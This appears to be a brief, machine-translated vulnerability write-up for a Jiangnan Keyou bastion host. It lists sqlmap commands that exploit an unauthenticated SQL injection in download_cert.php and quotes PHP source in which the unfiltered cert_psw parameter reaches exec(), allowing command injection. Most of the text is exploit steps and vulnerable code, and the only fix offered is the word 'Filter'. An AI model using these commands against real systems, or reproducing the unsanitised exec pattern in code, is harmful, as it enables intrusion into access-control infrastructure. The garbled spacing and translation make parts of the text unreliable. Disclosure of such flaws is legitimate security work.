Jiangnan keyou bastion host full-version code execution + SQL injection (No Logon required)
SQL Injection:
/System/download_cert.php? Manager = 1 & user_id = 2 & cert_psw = 11 user_id Parameter
Sqlmap-u "https://12XX.XXXX. 9X/system/download_cert.php? Manager = 1 & user_id = 2 & cert_psw = 11"
Sqlmap-u "https://12XX.XXXX. 9X/system/download_cert.php? Manager = 1 & user_id = 2 & cert_psw = 11 "-- dbs
Code execution:
This file is also used:
/System/download_cert.php parameter cert_psw
The Code is as follows:
If (! Empty ($ cert_msg ))
{$cmd = "openssl pkcs12 -export";if(!empty($_GET['cert_psw'])){$cmd .= " -password pass:".$_GET['cert_psw'];}else{$cmd .= " -password pass:";}$cmd .= " -inkey /usr/local/keyou/Config/certs/".$cert_msg[0]['serial_no'].".key -in /usr/local/keyou/Config/certs/".$cert_msg[0]['serial_no'].".pem -out /usr/local/apache2/htdocs/project/www/download/".$cert_msg[0]['serial_no'].".pfx";//echo $cmd;exec($cmd);
$ _ GET ['cert _ psw'] enters the exec dangerous function without any filtering, resulting in code execution...
Solution:
Filter